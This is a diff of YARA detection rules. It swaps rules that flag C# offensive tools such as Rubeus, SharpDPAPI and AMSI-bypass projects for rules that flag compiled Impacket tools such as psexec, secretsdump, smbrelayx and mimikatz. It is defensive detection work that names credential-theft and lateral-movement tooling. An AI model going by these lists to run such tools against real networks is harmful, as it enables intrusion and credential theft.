+		logic_hash = "0f424dd5cc525ef0bd9671c4c1b8da0a1ff9eb79056cc081c1ebe7c9bf75fee6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
 
 	strings:
-		$typelibguid0lo = "6840b249-1a0e-433b-be79-a927696ea4b3" ascii wide
-		$typelibguid0up = "6840B249-1A0E-433B-BE79-A927696EA4B3" ascii wide
-		$typelibguid1lo = "67c09d37-ac18-4f15-8dd6-b5da721c0df6" ascii wide
-		$typelibguid1up = "67C09D37-AC18-4F15-8DD6-B5DA721C0DF6" ascii wide
-		$typelibguid2lo = "e05d0deb-d724-4448-8c4c-53d6a8e670f3" ascii wide
-		$typelibguid2up = "E05D0DEB-D724-4448-8C4C-53D6A8E670F3" ascii wide
-		$typelibguid3lo = "c3cc72bf-62a2-4034-af66-e66da73e425d" ascii wide
-		$typelibguid3up = "C3CC72BF-62A2-4034-AF66-E66DA73E425D" ascii wide
-		$typelibguid4lo = "7ace3762-d8e1-4969-a5a0-dcaf7b18164e" ascii wide
-		$typelibguid4up = "7ACE3762-D8E1-4969-A5A0-DCAF7B18164E" ascii wide
-		$typelibguid5lo = "3296e4a3-94b5-4232-b423-44f4c7421cb3" ascii wide
-		$typelibguid5up = "3296E4A3-94B5-4232-B423-44F4C7421CB3" ascii wide
+		$s1 = "logging.config(" ascii
+		$s2 = "ssmbexec" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_BYTAGE : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Goldenpac : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4f87ca2c-3ac1-5733-893e-79665b80ffc3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/KNIF/BYTAGE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1294-L1308"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9894d16c-83fa-5e1d-9ca6-572deeec006a"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L224-L239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "faf0172ab464c4a19ce5ba4514f2a60ac4e78ce20be4fb4878a23e2980b6ea88"
+		logic_hash = "0c764083a699204819f9ff6e2664a50d467447d0fff040ef32a8e28cc678b3cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
 
 	strings:
-		$typelibguid0lo = "8e46ba56-e877-4dec-be1e-394cb1b5b9de" ascii wide
-		$typelibguid0up = "8E46BA56-E877-4DEC-BE1E-394CB1B5B9DE" ascii wide
+		$s1 = "impacket.examples.serviceinstall(" ascii
+		$s2 = "bgoldenPac.exe" fullword ascii
+		$s3 = "json.scanner(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Multios_Reverseshell : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Netview : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f54bcb1a-b0cd-5988-bf1d-4fa6c012d6b9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/belane/MultiOS_ReverseShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1310-L1324"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1b9238d2-b9b1-5633-8481-05a3a97af5a6"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L241-L256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae5a41fd66f058a8f89f6b9d488d7f4a845bf7829a1eb04f49c4e8e4c8db1cc0"
+		logic_hash = "e0beb6235838b4e8a1312ba53c539c6c3d732ba13a0190c654dcf7ec4389e364"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
 
 	strings:
-		$typelibguid0lo = "df0dd7a1-9f6b-4b0f-801e-e17e73b0801d" ascii wide
-		$typelibguid0up = "DF0DD7A1-9F6B-4B0F-801E-E17E73B0801D" ascii wide
+		$s1 = "impacket.dcerpc.v5.wkst(" ascii
+		$s2 = "dummy_threading(" ascii
+		$s3 = "snetview" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hidefromamsi : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Smbtorture : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0fa1ce82-b662-5e18-a5da-8359c96cd6e9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/0r13lc0ch4v1/HideFromAMSI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1326-L1340"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4f9b55e2-93ce-5d08-a228-73233fb0a2c6"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L258-L272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c4c06b8f40a38d5386cb49befd7705552b471e443188b6af1d85d7bd4277cc1c"
+		logic_hash = "63cbd6511c5498b39fa5efadb8fe0caeeaa8d4c2afe534a0169ea38f205a9cba"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
 
 	strings:
-		$typelibguid0lo = "b91d2d44-794c-49b8-8a75-2fbec3fe3fe3" ascii wide
-		$typelibguid0up = "B91D2D44-794C-49B8-8A75-2FBEC3FE3FE3" ascii wide
+		$s1 = "impacket" fullword ascii
+		$s2 = "ssmbtorture" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnetavbypass_Master : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Mimikatz : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4004271b-4fbe-58bb-9613-a077e76324b3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/lockfale/DotNetAVBypass-Master"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1342-L1356"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0b1f5ad0-7070-58d5-946f-157dcb9627ab"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L274-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "28446fae71b06f0418a5dd3cb6d6842dcc930313f7740704770b41f16ad0e7b5"
+		logic_hash = "0dce4086887877aa77063dfa3c69d7a17cfa0815c4ca417144d3bbb6ebe68650"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
 
 	strings:
-		$typelibguid0lo = "4854c8dc-82b0-4162-86e0-a5bbcbc10240" ascii wide
-		$typelibguid0up = "4854C8DC-82B0-4162-86E0-A5BBCBC10240" ascii wide
+		$s1 = "impacket" fullword ascii
+		$s2 = "smimikatz" fullword ascii
+		$s3 = "otwsdlc" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdpapi : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Smbrelayx : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1394323f-b336-548f-925c-c276d439e9eb"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/SharpDPAPI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1358-L1374"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "84abf3cf-841c-592d-a9d1-71d5e76eb43f"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L291-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5846d932bb8064a82e57f942d0c7a8feec4c8582bb2eac64be7cc662d60e6d6e"
+		logic_hash = "2afcede9d9f5af102c68e705f29242bc3a56485e79c0acfc347a4ea7f823dfda"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
 
 	strings:
-		$typelibguid0lo = "5f026c27-f8e6-4052-b231-8451c6a73838" ascii wide
-		$typelibguid0up = "5F026C27-F8E6-4052-B231-8451C6A73838" ascii wide
-		$typelibguid1lo = "2f00a05b-263d-4fcc-846b-da82bd684603" ascii wide
-		$typelibguid1up = "2F00A05B-263D-4FCC-846B-DA82BD684603" ascii wide
+		$s1 = "impacket.examples.secretsdump" fullword ascii
+		$s2 = "impacket.examples.serviceinstall" fullword ascii
+		$s3 = "impacket.smbserver(" ascii
+		$s4 = "SimpleHTTPServer(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Telegra_Csharp_C2 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Wmipersist : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "495a5f3e-cf05-5a66-b01c-8176ded88768"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/sf197/Telegra_Csharp_C2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1376-L1390"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "29bda652-28f0-5ab6-9bc2-411f20ab0dda"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L309-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b931009110366712cc9d69a7cb7feaa7a02f7baa93bc3c3fbb76c4132554b10e"
+		logic_hash = "df0dfaed264e0acc57f74e40addcaf52f6d8e832524eb638b682a358c81da83f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
 
 	strings:
-		$typelibguid0lo = "1d79fabc-2ba2-4604-a4b6-045027340c85" ascii wide
-		$typelibguid0up = "1D79FABC-2BA2-4604-A4B6-045027340C85" ascii wide
+		$s1 = "swmipersist" fullword ascii
+		$s2 = "\\yzHPlU=QA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcompile : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Lookupsid : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c5e053c4-1c90-581a-a6c3-087b252254b2"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/SpiderLabs/SharpCompile"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1392-L1406"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "27f13397-b044-54b4-b5e8-c5f7ed374f59"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L325-L339"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "60ecb9a9fa90e096d6b5d830787989046f5f8441282f4d7a072c6d7435add42d"
+		logic_hash = "629ddd49377017d6ea2aac9665b21dfdf9a50c917bf915ea892faafd841bf817"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "47756725d7a752d3d3cfccfb02e7df4fa0769b72e008ae5c85c018be4cf35cc1"
 
 	strings:
-		$typelibguid0lo = "63f81b73-ff18-4a36-b095-fdcb4776da4c" ascii wide
-		$typelibguid0up = "63F81B73-FF18-4A36-B095-FDCB4776DA4C" ascii wide
+		$s1 = "slookupsid" fullword ascii
+		$s2 = "impacket.dcerpc" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Carbuncle : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Wmiquery : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4a87882e-570b-5b40-a8e3-47ebac01d257"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/checkymander/Carbuncle"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1408-L1422"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e8bdf27a-9763-5947-854f-162f74ff53be"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L341-L355"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a5bd58ac42ed3a428d6f20f1956b5abe5dfd958e9768fb0e3916ee2672d9c55"
+		logic_hash = "fa237b5c1b4881804c33152a1ce9f3a571b506178fde455a8dd9f92af68c5610"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
 
 	strings:
-		$typelibguid0lo = "3f239b73-88ae-413b-b8c8-c01a35a0d92e" ascii wide
-		$typelibguid0up = "3F239B73-88AE-413B-B8C8-C01A35A0D92E" ascii wide
+		$s1 = "swmiquery" fullword ascii
+		$s2 = "\\yzHPlU=QA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ossfiletool : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Atexec : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fa9aeae1-2aa5-51af-81e2-22a1b6fcda81"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/B1eed/OSSFileTool"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1424-L1438"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4f02e304-69d4-5952-80be-793379bccac0"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L357-L373"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2158671f0372080a7f78a7c6804d8be6715953545e23733ef1db091b2d849f2f"
+		logic_hash = "e9537a67e17fb980505aead84b15c7dc8a2f3f1e9a4088edd8b313f1b7a9675d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "337bd5858aba0380e16ee9a9d8f0b3f5bfc10056ced4e75901207166689fbedc"
 
 	strings:
-		$typelibguid0lo = "207aca5d-dcd6-41fb-8465-58b39efcde8b" ascii wide
-		$typelibguid0up = "207ACA5D-DCD6-41FB-8465-58B39EFCDE8B" ascii wide
+		$s1 = "batexec.exe.manifest" fullword ascii
+		$s2 = "satexec" fullword ascii
+		$s3 = "impacket.dcerpc" fullword ascii
+		$s4 = "# CSZq" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rubeus : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Psexec : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "54638fe4-84b5-51a8-8c88-9c50ab09ff49"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/Rubeus"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1440-L1454"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5e8d0964-7e6a-5ff6-b9db-e37f997c3e05"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L375-L390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6c346bb0f6db20bd573c9a17d2b8110e6abd4fe3c51d7c717feefa2c517319b"
+		logic_hash = "922b2adec9c73d36343c0182f72f5a325c93c051a22e3f80236f942287d0738b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
 
 	strings:
-		$typelibguid0lo = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii wide
-		$typelibguid0up = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii wide
+		$s1 = "impacket.examples.serviceinstall(" ascii
+		$s2 = "spsexec" fullword ascii
+		$s3 = "impacket.examples.remcomsvc(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Simple_Loader : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Generic_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4c26aaf9-187d-5990-b956-1bbf630411f0"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/cribdragg3r/Simple-Loader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1456-L1470"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d2ce6426-d165-5569-a992-268f05622653"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L392-L427"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c94da47cdcf94f71d0909f1532108442e324e79e249646e5619865bdbd2d3c14"
+		logic_hash = "a66953ca6a99a7880d757a754bb3010aa394de73292975a3741ec5cf1f20385d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
+		hash2 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
+		hash3 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
+		hash4 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
+		hash5 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
+		hash6 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
+		hash7 = "dc85a3944fcb8cc0991be100859c4e1bf84062f7428c4dc27c71e08d88383c98"
+		hash8 = "0f7f0d8afb230c31fe6cf349c4012b430fc3d6722289938f7e33ea15b2996e1b"
+		hash9 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
+		hash10 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
+		hash11 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
+		hash12 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
+		hash13 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
+		hash14 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
+		hash15 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
+		hash16 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
+		hash17 = "e300339058a885475f5952fb4e9faaa09bb6eac26757443017b281c46b03108b"
+		hash18 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
+		hash19 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
+		hash20 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
 
 	strings:
-		$typelibguid0lo = "035ae711-c0e9-41da-a9a2-6523865e8694" ascii wide
-		$typelibguid0up = "035AE711-C0E9-41DA-A9A2-6523865E8694" ascii wide
+		$s1 = "bpywintypes27.dll" fullword ascii
+		$s2 = "hZFtPC" fullword ascii
+		$s3 = "impacket" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 21000KB and all of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Minidump : FILE
+rule SIGNATURE_BASE_Impacket_Lateral_Movement : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "51f64c64-f3fa-5543-83fc-5f0bf881ef03"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/3xpl01tc0d3r/Minidump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1472-L1486"
+		description = "Detects Impacket Network Aktivity for Lateral Movement"
+		author = "Markus Neis"
+		id = "44db234c-ac81-5d21-bc2a-8cfd88807c0d"
+		date = "2018-03-22"
+		modified = "2025-03-29"
+		reference = "https://github.com/CoreSecurity/impacket"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L429-L447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "80142c0e96bca63f2b9991b3d6e2dfa7261bdde3a748fde96113d6f422b21e34"
-		score = 75
+		logic_hash = "6628c27474d5235d5b510a55215762980a5b526b353b740344cb669e8e023e3c"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "15c241aa-e73c-4b38-9489-9a344ac268a3" ascii wide
-		$typelibguid0up = "15C241AA-E73C-4B38-9489-9A344AC268A3" ascii wide
+		$s1 = "impacket.dcerpc.v5.transport(" ascii
+		$s2 = "impacket.smbconnection(" ascii
+		$s3 = "impacket.dcerpc.v5.ndr(" ascii
+		$s4 = "impacket.spnego(" ascii
+		$s5 = "impacket.smb(" ascii
+		$s6 = "impacket.ntlm(" ascii
+		$s7 = "impacket.nmb(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 14000KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbypassuac : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "474d40aa-4bcc-58b5-a129-40bbd3a89e99"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/FatRodzianko/SharpBypassUAC"
